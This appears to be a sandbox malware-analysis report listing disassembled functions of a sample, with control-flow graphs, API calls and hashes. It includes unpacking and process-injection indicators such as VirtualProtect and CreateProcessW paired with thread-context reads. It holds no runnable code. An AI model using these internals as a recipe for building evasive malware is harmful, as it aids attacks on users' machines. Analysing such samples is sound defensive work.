                                              • Instruction Fuzzy Hash: DF519270D04259DBEF21DBA4C855BEFBBB8AF04300F1041A9E648BB2C0D7795B45CBA5
                                              Function 00DE2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1323 de2947-de29b9 call db1f50 call de25d6 call d8fe0b call d75722 call de274e call d7511f call d95232 1338 de29bf-de29c6 call de2e66 1323->1338 1339 de2a6c-de2a73 call de2e66 1323->1339 1344 de29cc-de2a6a call d9d583 call d94983 call d99038 call d9d583 call d99038 * 2 1338->1344 1345 de2a75-de2a77 1338->1345 1339->1345 1346 de2a7c 1339->1346 1349 de2a7f-de2b3a call d750f5 * 8 call de3017 call d9e5eb 1344->1349 1348 de2cb6-de2cb7 1345->1348 1346->1349 1351 de2cd5-de2cdb 1348->1351 1388 de2b3c-de2b3e 1349->1388 1389 de2b43-de2b5e call de2792 1349->1389 1355 de2cdd-de2ced call d8fdcd call d8fe14 1351->1355 1356 de2cf0-de2cf6 1351->1356 1355->1356 1388->1348 1392 de2b64-de2b6c 1389->1392 1393 de2bf0-de2bfc call d9e678 1389->1393 1394 de2b6e-de2b72 1392->1394 1395 de2b74 1392->1395 1400 de2bfe-de2c0d DeleteFileW 1393->1400 1401 de2c12-de2c16 1393->1401 1397 de2b79-de2b97 call d750f5 1394->1397 1395->1397 1407 de2b99-de2b9e 1397->1407 1408 de2bc1-de2bd7 call de211d call d9dbb3 1397->1408 1400->1348 1403 de2c18-de2c7e call de25d6 call d9d2eb * 2 call de22ce 1401->1403 1404 de2c91-de2ca5 CopyFileW 1401->1404 1405 de2cb9-de2ccf DeleteFileW call de2fd8 1403->1405 1428 de2c80-de2c8f DeleteFileW 1403->1428 1404->1405 1406 de2ca7-de2cb4 DeleteFileW 1404->1406 1417 de2cd4 1405->1417 1406->1348 1413 de2ba1-de2bb4 call de28d2 1407->1413 1423 de2bdc-de2be7 1408->1423 1421 de2bb6-de2bbf 1413->1421 1417->1351 1421->1408 1423->1392 1425 de2bed 1423->1425 1425->1393 1428->1348
                                              APIs
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2C05
                                              • DeleteFileW.KERNEL32(?), ref: 00DE2C87
                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE2C9D
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2CAE
                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2CC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: File$Delete$Copy
                                              • String ID:
                                              • API String ID: 3226157194-0
                                              • Opcode ID: e8c8a397bceabb62532d3b1aba80129dac53ba2c746ec2ebdcff280ed64c9638
                                              • Instruction ID: 9bccb8110f97812e6cdb1a6cd843c9a502cc89c1dcf2333848db030af6320dd9
                                              • Opcode Fuzzy Hash: e8c8a397bceabb62532d3b1aba80129dac53ba2c746ec2ebdcff280ed64c9638
                                              • Instruction Fuzzy Hash: B5B15D72D00119ABDF21EBA5CC85EEEBBBDEF48350F1040A6F609E6155EA319A448F71
                                              Function 00EB7730 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1429 eb7730-eb773d 1430 eb774a-eb774f 1429->1430 1431 eb7751 1430->1431 1432 eb7753 1431->1432 1433 eb7740-eb7745 1431->1433 1435 eb7758-eb775a 1432->1435 1434 eb7746-eb7748 1433->1434 1434->1430 1434->1431 1436 eb775c-eb7761 1435->1436 1437 eb7763-eb7767 1435->1437 1436->1437 1438 eb7769 1437->1438 1439 eb7774-eb7777 1437->1439 1440 eb776b-eb7772 1438->1440 1441 eb7793-eb7798 1438->1441 1442 eb7779-eb777e 1439->1442 1443 eb7780-eb7782 1439->1443 1440->1439 1440->1441 1444 eb77ab-eb77ad 1441->1444 1445 eb779a-eb77a3 1441->1445 1442->1443 1443->1435 1448 eb77af-eb77b4 1444->1448 1449 eb77b6 1444->1449 1446 eb781a-eb781d 1445->1446 1447 eb77a5-eb77a9 1445->1447 1450 eb7822-eb7825 1446->1450 1447->1449 1448->1449 1451 eb77b8-eb77bb 1449->1451 1452 eb7784-eb7786 1449->1452 1455 eb7827-eb7829 1450->1455 1456 eb77bd-eb77c2 1451->1456 1457 eb77c4 1451->1457 1453 eb7788-eb778d 1452->1453 1454 eb778f-eb7791 1452->1454 1453->1454 1458 eb77e5-eb77f4 1454->1458 1455->1450 1459 eb782b-eb782e 1455->1459 1456->1457 1457->1452 1460 eb77c6-eb77c8 1457->1460 1461 eb77f6-eb77fd 1458->1461 1462 eb7804-eb7811 1458->1462 1459->1450 1463 eb7830-eb784c 1459->1463 1464 eb77ca-eb77cf 1460->1464 1465 eb77d1-eb77d5 1460->1465 1461->1461 1466 eb77ff 1461->1466 1462->1462 1467 eb7813-eb7815 1462->1467 1463->1455 1468 eb784e 1463->1468 1464->1465 1465->1460 1469 eb77d7 1465->1469 1466->1434 1467->1434 1472 eb7854-eb7858 1468->1472 1470 eb77d9-eb77e0 1469->1470 1471 eb77e2 1469->1471 1470->1460 1470->1471 1471->1458 1473 eb785a-eb7870 LoadLibraryA 1472->1473 1474 eb789f-eb78a2 1472->1474 1476 eb7871-eb7876 1473->1476 1475 eb78a5-eb78ac 1474->1475 1478 eb78ae-eb78b0 1475->1478 1479 eb78d0-eb7900 VirtualProtect * 2 1475->1479 1476->1472 1477 eb7878-eb787a 1476->1477 1480 eb787c-eb7882 1477->1480 1481 eb7883-eb7890 GetProcAddress 1477->1481 1482 eb78c3-eb78ce 1478->1482 1483 eb78b2-eb78c1 1478->1483 1484 eb7904-eb7908 1479->1484 1480->1481 1485 eb7899 ExitProcess 1481->1485 1486 eb7892-eb7897 1481->1486 1482->1483 1483->1475 1484->1484 1487 eb790a 1484->1487 1486->1476
                                              APIs
                                              • LoadLibraryA.KERNEL32(?), ref: 00EB786A
                                              • GetProcAddress.KERNEL32(?,00EB0FF9), ref: 00EB7888
                                              • ExitProcess.KERNEL32(?,00EB0FF9), ref: 00EB7899
                                              • VirtualProtect.KERNELBASE(00D70000,00001000,00000004,?,00000000), ref: 00EB78E7
                                              • VirtualProtect.KERNELBASE(00D70000,00001000), ref: 00EB78FC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                              • String ID:
                                              • API String ID: 1996367037-0
                                              • Opcode ID: 1356178b0cf8e1fab21152d99001543fe609b5c1b2be5cccc37597f4e3506fc6
                                              • Instruction ID: dc1259974267892cd424821d034c6a548496f0b74c4779442a037ae5ed8e67ae
                                              • Opcode Fuzzy Hash: 1356178b0cf8e1fab21152d99001543fe609b5c1b2be5cccc37597f4e3506fc6
                                              • Instruction Fuzzy Hash: 60513872A4C2724BD7258EB8CCC46E27B91EB813257281779C5E2E7BC5EBA05805C7A0
                                              Function 00D73B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D73B0F,SwapMouseButtons,00000004,?), ref: 00D73B40
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D73B0F,SwapMouseButtons,00000004,?), ref: 00D73B61
                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D73B0F,SwapMouseButtons,00000004,?), ref: 00D73B83
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 68d777c0a7cd8f4ffe5b0de83bd002b6fb610e87cef3ef523de740888b5ba437
                                              • Instruction ID: 316be0c03da355c77fba6dd17c26fb7517977b7dd9d15feadd2109b9d3ad2f46
                                              • Opcode Fuzzy Hash: 68d777c0a7cd8f4ffe5b0de83bd002b6fb610e87cef3ef523de740888b5ba437
                                              • Instruction Fuzzy Hash: BC112AB5510218FFDB208FA5DC44AEEB7BCEF04744B14855AA809E7110E2319E44A7A0
                                              Function 01042510 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01042CCB
                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01042D61
                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01042D83
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1797146074.0000000001041000.00000040.00000020.00020000.00000000.sdmp, Offset: 01041000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1041000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                              • String ID:
                                              • API String ID: 2438371351-0
                                              • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                              • Instruction ID: af377917bb008c28304093e25e8b34d12330a972dd93181f1af1561a6df5dd2b
                                              • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                              • Instruction Fuzzy Hash: 91621B70A142589BEB24CFA4D890BDEB772FF58300F1091A9E14DEB390E7759E81CB59
                                              Function 00D73923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DB33A2
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D73A04
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String_wcslen
                                              • String ID: Line:
                                              • API String ID: 2289894680-1585850449
                                              • Opcode ID: 168111cb8558f5ce856846e8514b8d92280e49e2a3e1ab45f046f474808e5dd7
                                              • Instruction ID: 2071971abb97fd7963bbaf411331fce2c5e38de7cff3a1d4a86a0cf6a1b2d6c9
                                              • Opcode Fuzzy Hash: 168111cb8558f5ce856846e8514b8d92280e49e2a3e1ab45f046f474808e5dd7
                                              • Instruction Fuzzy Hash: 2031A271408310AEC721EF24DC46BEBB7E8EB81710F14856AF59D92191FB709689DBF2
                                              Function 00D8FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00D90668
                                                • Part of subcall function 00D932A4: RaiseException.KERNEL32(?,?,?,00D9068A,?,00E41444,?,?,?,?,?,?,00D9068A,00D71129,00E38738,00D71129), ref: 00D93304
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00D90685
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw$ExceptionRaise
                                              • String ID: Unknown exception
                                              • API String ID: 3476068407-410509341
                                              • Opcode ID: c5a18eb9aa05ed8692aa790305cba081ffb612d21626b8fff6b87e5d690b5b3b
                                              • Instruction ID: 5497b59335666f923ae1beb77d94432b6e3b9e027a3d678398d8791308ca0f04
                                              • Opcode Fuzzy Hash: c5a18eb9aa05ed8692aa790305cba081ffb612d21626b8fff6b87e5d690b5b3b
                                              • Instruction Fuzzy Hash: A5F04F24900309BB8F00B7A4E84AD9E7B6C9E40350B644531B924D65D2EF71EA66C6B0
                                              Function 00DE3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00DE302F
                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DE3044
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Temp$FileNamePath
                                              • String ID: aut
                                              • API String ID: 3285503233-3010740371
                                              • Opcode ID: 304ba0cd37a55141564905e57a26bece504a7f4447950329c99443d6ba880124
                                              • Instruction ID: 6a3b1f96fc54c5c4437482a5cd668239ac0936fa5d7e7a3f35281c1e74863b57
                                              • Opcode Fuzzy Hash: 304ba0cd37a55141564905e57a26bece504a7f4447950329c99443d6ba880124
                                              • Instruction Fuzzy Hash: 57D05E72500328BBDA20A7A5AC0EFDB3E6CDB05750F0002A1B655F20E1DAB19988CAD0
                                              Function 00DF7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DF82F5
                                              • TerminateProcess.KERNEL32(00000000), ref: 00DF82FC
                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00DF84DD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$CurrentFreeLibraryTerminate
                                              • String ID:
                                              • API String ID: 146820519-0
                                              • Opcode ID: 2a476a96465f15ba35f7d6148bc5fcf2a78b465cf17dedf92b1f5846997a7925
                                              • Instruction ID: c68470c3fd6ee0878b2d870d9ffac07fa6d90368d1417a29263380d24b2fb08d
                                              • Opcode Fuzzy Hash: 2a476a96465f15ba35f7d6148bc5fcf2a78b465cf17dedf92b1f5846997a7925
                                              • Instruction Fuzzy Hash: FA127B71A083459FC714DF28C484B2ABBE1FF85318F19C95DE9898B352DB31E945CBA2
                                              Function 00DA5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d2abdebf024dcc8e7ada43e85c5cb86ba1177ddf74a4239efa8ac9c1befca0e7
                                              • Instruction ID: 7e12bf1c6bd3b17e998c3de122644baecfef4cda1facb9da9932a2e95a4e1eee
                                              • Opcode Fuzzy Hash: d2abdebf024dcc8e7ada43e85c5cb86ba1177ddf74a4239efa8ac9c1befca0e7
                                              • Instruction Fuzzy Hash: 7751A175E00609AFCF10AFA5E845FAEBBB8EF07320F180159F505A7299D675D901CB71
                                              Function 00D710F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D71BF4
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D71BFC
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D71C07
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D71C12
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D71C1A
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D71C22
                                                • Part of subcall function 00D71B4A: RegisterClipboardFormatW.USER32(00000004), ref: 00D71BA2
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D7136A
                                              • OleInitialize.OLE32 ref: 00D71388
                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00DB24AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                              • String ID:
                                              • API String ID: 3094916012-0
                                              • Opcode ID: 8adef3dbf72d6c99867894da9348dffc2716bad8f57f5890b74ae0c2aa01a3d4
                                              • Instruction ID: e2245f5f395f520a9b4d3dfa46db48932f4d878872f99764e85c935f49ce0ee9
                                              • Opcode Fuzzy Hash: 8adef3dbf72d6c99867894da9348dffc2716bad8f57f5890b74ae0c2aa01a3d4
                                              • Instruction Fuzzy Hash: 367190BC9113448ECB84DF7BE8466953AE0FBCA34435492AAD51AF7261F73844CACF61
                                              Function 00D754C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00D7556D
                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00D7557D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: b36b5774f3158243d070e425b44d820042a8b20603528ab6cb41798d8d3e7bfd
                                              • Instruction ID: bad8af07cc6a568e21e8ceea45c5c18479131f0d4f4a4a19eb8bbc188ebf43fd
                                              • Opcode Fuzzy Hash: b36b5774f3158243d070e425b44d820042a8b20603528ab6cb41798d8d3e7bfd
                                              • Instruction Fuzzy Hash: A0316071A00609FFDB14CF28D880B99B7B5FB48714F18C629E91997244E7B1FD94CBA1
                                              Function 00DDC161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D73923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D73A04
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DDC259
                                              • KillTimer.USER32(?,00000001,?,?), ref: 00DDC261
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DDC270
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer$Kill
                                              • String ID:
                                              • API String ID: 3500052701-0
                                              • Opcode ID: 147ad2993941afa4abe6965e3e6c16334b5685121ed0aa357e6396b847c3ebe5
                                              • Instruction ID: 08de19b17e54d367055259e7689ad76f824b41c2ea5029691a5f856589032a7a
                                              • Opcode Fuzzy Hash: 147ad2993941afa4abe6965e3e6c16334b5685121ed0aa357e6396b847c3ebe5
                                              • Instruction Fuzzy Hash: CE31C570914344AFEB328F748895BE7BFEC9B06308F04149EE5DAA7241C3745A88CB65
                                              Function 00DA86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNELBASE(00000000,00000000,?,?,00DA85CC,?,00E38CC8,0000000C), ref: 00DA8704
